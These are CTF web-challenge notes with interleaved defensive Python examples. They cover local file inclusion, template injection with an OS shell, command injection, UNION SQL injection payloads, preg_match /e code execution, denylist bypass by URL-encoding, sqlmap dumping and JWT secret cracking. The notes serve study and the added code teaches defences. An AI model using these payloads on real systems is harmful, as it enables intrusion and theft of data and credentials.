- # Today's Knowledge (Shellshock vulnerability) 9/22/2020
- #### https://blog.cloudflare.com/inside-shellshock/
- # Write-up for VirSecCon CTF
- #### https://github.com/Yash-Amin/virsecconCTF/tree/master/Web
- #### https://www.youtube.com/watch?v=_d82Ia0RV0w
- 9/22/2020
- # Countdown
- Firstly, click the link; an alert appears: "You are too late !!!!!!!"
- Now I pass the request through Burp Suite and increase the cookie value. Now I get the flag!
- * View the source of any PHP file:
- ** php://filter/convert.base64-encode/resource=index
- ** fopen wrappers work with the following functions: include, include_once, require, require_once.
- # Hot Access
- Right-click --> View Page Source
- I found the links used to load PHP files, for example --> <a href="http://jh2i.com:50016/?m=modules/date.php">. So this may be LFI, and I change the query to /etc/passwd (or \etc\passwd on Windows) <<<< ?m=/etc/passwd >>>> This shows /etc/passwd!!
- The next step can go two ways: try ?m=.htaccess, or use php://filter/convert.base64-encode/resource=index.php
- 1st way --> enter .htaccess and you can see the directory; I put it after the parameter --> ?m=/var/www/html/sshh_dont_tell_i_hid_the_flag_here and I get the flag!
- 2nd way --> ?m=php://filter/convert.base64-encode/resource=index.php ... Brute force with lfi.txt ---> .htaccess; I found the directory and pasted it after the parameter. Now I get the flag.
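The two challenges above both come down to one unchecked `?m=` parameter reaching an include. The following is an added example (not code from the write-up or the challenge) showing how the server side should resolve that parameter: refuse stream wrappers such as php://filter, normalise the path so `..` and absolute paths cannot leave the web root, and then only accept names on an allowlist. The web root, the allowlist and the probe strings are constructed for the demo.

```python
import posixpath
import re

# Constructed values: a web root and the set of modules the page legitimately loads.
WEB_ROOT = "/var/www/html"
ALLOWED_MODULES = {"modules/date.php", "modules/news.php"}

# Anything that starts with a scheme (php:, file:, data:, http:) is a stream wrapper, not a file.
_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def resolve_module(m: str):
    """Map the ?m= value to an absolute path, or return None when it must be rejected.

    Defence in depth: refuse wrappers and NUL bytes, normalise the path so that
    '..' cannot escape WEB_ROOT, then require the result to be on the allowlist.
    """
    if not m or "\x00" in m or _SCHEME_RE.match(m):
        return None
    # posixpath.join discards WEB_ROOT when m is absolute (e.g. /etc/passwd);
    # normpath collapses '..' segments; the prefix check then catches both cases.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, m))
    if not candidate.startswith(WEB_ROOT + "/"):
        return None
    relative = posixpath.relpath(candidate, WEB_ROOT)
    if relative not in ALLOWED_MODULES:
        return None
    return candidate


def classify(requests):
    """Return {value: 'allowed' | 'rejected'} for a batch of ?m= values."""
    return {m: ("allowed" if resolve_module(m) else "rejected") for m in requests}


if __name__ == "__main__":
    # Constructed probes: the write-up's own attempts plus a couple of variants.
    probes = [
        "modules/date.php",
        "/etc/passwd",
        "../../etc/passwd",
        "php://filter/convert.base64-encode/resource=index.php",
        ".htaccess",
        "modules/../index.php",
    ]
    for value, verdict in classify(probes).items():
        print(f"{verdict:8} {value}")
```

Only `modules/date.php` survives; the wrapper, the absolute path, the traversal and the `.htaccess` read are all rejected before anything is included. The allowlist is what matters most: path normalisation alone would still let `modules/../index.php` through as `index.php`.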
- 9/23/2020
- **strcmp is a function created to compare strings.** We use an array to bypass the strcmp string check!!! flag[]=""
- # PHPJuggler
- In the page source, I see the strcmp function!! So I use Burp and bypass strcmp: I change flag=anything to flag[]=anything. TAN TANNN TAN !!!!!!!
- ** {{ ... }} for expressions to print to the template output (Jinja2 template)
- ** Tplmap – open source tool to scan for server-side template injection vulnerabilities
- ** git clone https://github.com/epinna/tplmap
- python tplmap.py -u url -d "variable=*"
- # Mask
- Hint::: Flask application ---> So I test {{2*5}}, and it works!! Therefore I apply tplmap for server-side template injection!!
- python tplmap.py -u url -d "mask=*" # mask = variable
- tplmap reports that one of the following options is available !! --os-shell, so: python tplmap.py -u url -d "mask=*" --os-shell
- Run commands on the operating system
- $ ls
- $ cat flag.txt BOMMMMM!!!!!!!!!
- # Character Web Shell
- I pass it through Burp and I see the parameter. So I test the parameter with ?c=ls or ?c=;ls and it works. I scroll through the output and find flag.txt, so I read flag.txt: http://...../flag.txt, or another way, ?c=cat */*. W0W!!!! Wowwww!!!! Wow!
- # Sequetilis
- I got a new idea in this challenge! If I see a search form, I test whether it is SQL-injectable or not!!!
- ## ' or 1=1 -- - ## '+or+'1'='1 Then I want to know the number of columns, and I write this --> ' order by 1 -- - and then 2, 3, 4
- #### ' union select 1,2,3 -- -
- #### ' union select table_schema,2,table_name from information_schema.tables -- - OR
- ## ' union select group_concat(table_name),2,3 from information_schema.tables -- -
- #### ' union select column_name,2,3 from information_schema.columns -- - OR
- ## ' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database() -- -
- #### ' union select value,2,3 from flag -- -
- ## ' union select group_concat(column_name),2,3 from information_schema.columns where column_name='flag' -- -
- ## ' union select value,2,3 from flag -- -
- **** https://location-href.com/web-security/
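To make the Sequetilis notes concrete from the application side, here is an added example (not code from the write-up or the challenge) that builds a constructed SQLite database with a three-column products table and a flag table, then runs the page's `' or 1=1 -- -` and `' union select value,2,3 from flag -- -` inputs through a string-built query and through a parameterised one. The table names, rows and flag value are all constructed.

```python
import sqlite3

# Constructed stand-in for the challenge database: a 3-column products table
# (which is why the page's UNION payloads carry exactly three columns) and a flag table.
CONSTRUCTED_FLAG = "LLS{constructed_example_flag}"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "apple", 1.0), (2, "banana", 0.5)])
    conn.execute("CREATE TABLE flag (value TEXT)")
    conn.execute("INSERT INTO flag VALUES (?)", (CONSTRUCTED_FLAG,))
    conn.commit()
    return conn


def search_vulnerable(conn, term: str):
    """String-built query: the search term is spliced straight into the SQL text."""
    sql = f"SELECT id, name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term: str):
    """Parameterised query: the term is bound as data and can never change the statement."""
    sql = "SELECT id, name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def leaks_flag(rows) -> bool:
    """True if any returned row carries a value from the flag table instead of a product id."""
    return any(isinstance(row[0], str) and row[0].startswith("LLS{") for row in rows)


if __name__ == "__main__":
    conn = build_db()
    for term in ["app", "' or 1=1 -- -", "' union select value,2,3 from flag -- -"]:
        print(f"term={term!r}")
        print("  vulnerable:", search_vulnerable(conn, term))
        print("  safe      :", search_safe(conn, term))
```

With the string-built query the `or 1=1` input returns every product and the UNION input returns a row whose first column is the flag; the parameterised query treats both inputs as literal text to match and returns nothing. The column count the write-up probes with `order by` is visible here as the three columns the UNION has to supply.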
- 9/24/2020
- ** GitDumper
- * Downloads .git repositories from web servers that do not have directory listing enabled.
- usage --> ./gitdumper.sh -h
- # Dairy Products
- git milk?
- So I try the URL with /.git, like "http://142.93.3.19:50008/.git"
- I use gitdumper to download the repository!!
- ### ./gitdumper.sh http://142.93.3.19:50008/.git dump # if the directory already exists, delete it first. # rm -r demo. After the download completes:
- ### cd ../Extractor ## ls ## if the output directory already exists, delete it. # rm -r output
- ### ./extractor.sh ../Dumper/dump/ output
- ### cd output ### grep -rn "LLS{" OHHHHHHHHHHHHHHHHH!!!!!!!!! SoOOOO DiZzy !!!!!!!!!!!!!!!!!!!
- # Irregular Function
- **preg_match -> regular expression match!** preg_match(/php/i ---> i means case-insensitive search !!! @pattern part
- In this challenge, I notice the regex function. I know that the preg_match function was vulnerable to remote code execution (RCE).
- So bypass this function with /e in the pattern, like /quick/e, and try to read /etc/passwd using the system function: system('/etc/passwd'), then system('ls -al'). As a result, this finds the irregular word, which I read with system('cat irregular words'). Another way! In Burp Suite: pattern = /(.*)/e, replace = `ls+-la`, text = test, and for the file read GET /irregular word
- # GET Encoded
- I visit the link and find only this sentence: "Machine hunts for more than humans do"
- Firstly, I try the URL --> jh2i.com:50013/robots.txt. Wow!! Disallow: /?debug >>>> jh2i.com:50013/?debug >>>
- $blacklist=assert|system|passthru|exec.... >> and it checks -> if (preg_match("/$blacklist/i", $_SERVER['REQUEST_URI'])) { die('Go away hacker'); } -> So I use Burp, send GET /?system=ls HTTP/1.1, but I see an error. I URL-encode "system" in the Decoder tab, then copy and paste it --> GET /?%73%79%73%74%65%6d=ls. I found a ----.php file and tried GET /?%73%79%73%74%65%6d=----.php, and I got an error again. Finally, I URL-encode the PHP filename too. BOMMM!!!!!!!!!!!!!!
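The GET Encoded check fails for a reason worth seeing in code: the denylist regex runs over the raw request line, so a percent-encoded parameter name never matches. The same lesson applies to the Character Web Shell parameter, where `;ls` and `cat */*` only work because the value is passed to a shell unvalidated. The following added example (not code from the write-up or either challenge) contrasts the raw-URI denylist with a decode-then-allowlist check that rejects unknown parameter names and shell metacharacters. The denylist words come from the page; the allowed parameter names and sample requests are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The challenge's denylist as shown on the page (the page elides the rest with "....").
DENYLIST = re.compile(r"assert|system|passthru|exec", re.IGNORECASE)
# Constructed: the only query parameters the application actually understands.
ALLOWED_PARAMS = {"debug", "page"}
# Characters that change the meaning of a string handed to a shell.
SHELL_META = re.compile(r"[;&|`$<>*?\n]")


def denylist_hits_raw(request_target: str) -> bool:
    """The challenge's check: the regex runs over the raw, still percent-encoded URI."""
    return DENYLIST.search(request_target) is not None


def denylist_hits_decoded(request_target: str) -> bool:
    """Same regex after one round of percent-decoding, which is what the page's bypass relies on."""
    return DENYLIST.search(unquote(request_target)) is not None


def validate_request(request_target: str):
    """Allowlist validation: decode, then reject unknown parameter names and shell metacharacters.

    Returns a list of problems; an empty list means the request is acceptable.
    """
    query = urlsplit(request_target).query
    problems = []
    # parse_qsl percent-decodes both names and values, so encoded names cannot hide.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in ALLOWED_PARAMS:
            problems.append(f"unknown parameter {name!r}")
        if SHELL_META.search(value):
            problems.append(f"shell metacharacter in {name!r}")
    return problems


if __name__ == "__main__":
    # Constructed request targets modelled on the two write-ups.
    samples = ["/?debug", "/?system=ls", "/?%73%79%73%74%65%6d=ls", "/?c=;ls", "/?page=cat+*/*"]
    for target in samples:
        print(f"{target:26} raw={denylist_hits_raw(target)!s:5} "
              f"decoded={denylist_hits_decoded(target)!s:5} problems={validate_request(target)}")
```

Decoding before matching closes the single-encoding gap, but a denylist still has to anticipate every spelling and every double-encoding. The allowlist version does not: a parameter the application never defined is rejected regardless of how it is encoded, and a value with shell metacharacters is rejected before it can reach any command.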
- # Eyeless
- Firstly, I test username ==> ' or 1=1 -- - and password=1111, and it shows "Good Job". But no flag HERE!! Damn! I know that it is SQL injection. Then I open the developer tools and take the params. Now I use sqlmap ## sqlmap -u "url" --data="param" --dbs
- To make it faster ## sqlmap -u "url" --data="param" --dbs --time-sec=2 --threads 10
- Skip ahead --> # sqlmap -u "url" --data="param" -D eyeless -T users --dump --time-sec=2
- ARRR!!! I get it.
- # JaWT
- This challenge is about JSON Web Tokens. We need to change the user to admin, but changing the value to admin without knowing the secret key is not possible. To find the secret key, we use John the Ripper on Linux.
- JWT debugger -> jwt.io (in the browser)
- 1. Copy the cookie value and paste it into the Encoded box in the JWT debugger -> we see the three parts -> header, payload, signature
- 2. Copy the cookie and save it as something.txt
- 3. # john ./picoJWT-textfile.txt --wordlist=./rockyou.txt (/usr/share/wordlists/rockyou.txt)
- OR
- 3. john something.txt -> john --show something.txt
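The JaWT notes say the admin flip is impossible without the secret, and that a wordlist run recovers it. This added example (not code from the write-up or the challenge) shows both halves from the server's side using only the standard library: minting and verifying an HS256 token with a pinned algorithm and constant-time comparison, so a payload edited to role=admin with the old signature is refused, plus a deployment check that flags the short or dictionary-word secrets that a wordlist run would recover. The secret, the claims and the tiny wordlist are constructed.

```python
import base64
import hashlib
import hmac
import json

# Constructed: a server secret long enough that a wordlist attack is pointless.
STRONG_SECRET = b"constructed-demo-secret-0123456789abcdefghij"
MIN_SECRET_BYTES = 32


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint(payload: dict, secret: bytes) -> str:
    """Issue an HS256 JWT: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (_b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + _b64url(json.dumps(payload, separators=(",", ":")).encode()))
    signature = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(signature)}"


def verify(token: str, secret: bytes):
    """Return the payload if the token is genuine, else None.

    The server pins the algorithm (so alg=none or a swapped algorithm is refused)
    and compares signatures in constant time.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    head, body, sig = parts
    try:
        header = json.loads(_b64url_decode(head))
        provided = _b64url_decode(sig)
    except ValueError:  # covers bad base64 and bad JSON
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{head}.{body}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, provided):
        return None
    return json.loads(_b64url_decode(body))


def tamper(token: str, new_payload: dict) -> str:
    """Swap the payload segment but keep the old signature: all that is possible without the secret."""
    head, _body, sig = token.split(".")
    return f"{head}.{_b64url(json.dumps(new_payload, separators=(',', ':')).encode())}.{sig}"


def secret_is_weak(secret: bytes, wordlist) -> bool:
    """Deployment check: short or dictionary-word secrets are exactly what a wordlist run recovers."""
    return len(secret) < MIN_SECRET_BYTES or secret in wordlist


if __name__ == "__main__":
    token = mint({"user": "bob", "role": "user"}, STRONG_SECRET)
    print("genuine :", verify(token, STRONG_SECRET))
    print("tampered:", verify(tamper(token, {"user": "bob", "role": "admin"}), STRONG_SECRET))
    # Constructed three-word list standing in for rockyou.txt.
    print("weak?   :", secret_is_weak(b"password123", {b"password123", b"secret", b"admin"}))
```

The verification path never reads the algorithm from the token to decide what to do; it only checks that the token claims the one algorithm the server supports. That, together with a secret that is not in any wordlist, is what makes the write-up's cracking step the only route to admin, and a strong secret removes that route too.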